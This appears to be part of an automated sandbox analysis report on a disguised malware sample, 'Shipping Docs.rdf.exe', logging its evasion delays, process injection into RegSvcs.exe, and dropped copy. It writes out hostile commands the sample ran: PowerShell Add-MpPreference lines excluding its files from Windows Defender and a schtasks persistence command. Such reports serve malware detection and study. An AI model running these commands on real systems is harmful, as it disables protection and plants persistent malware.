Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000008.00000002.2448074833.000001E665A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2450817917.000001E66B058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 00000009.00000002.1249521421.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F04008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E30008	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Queries volume information: C:\Users\user\Desktop\Shipping Docs.rdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Queries volume information: C:\Users\user\AppData\Roaming\SVcPIbJno.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
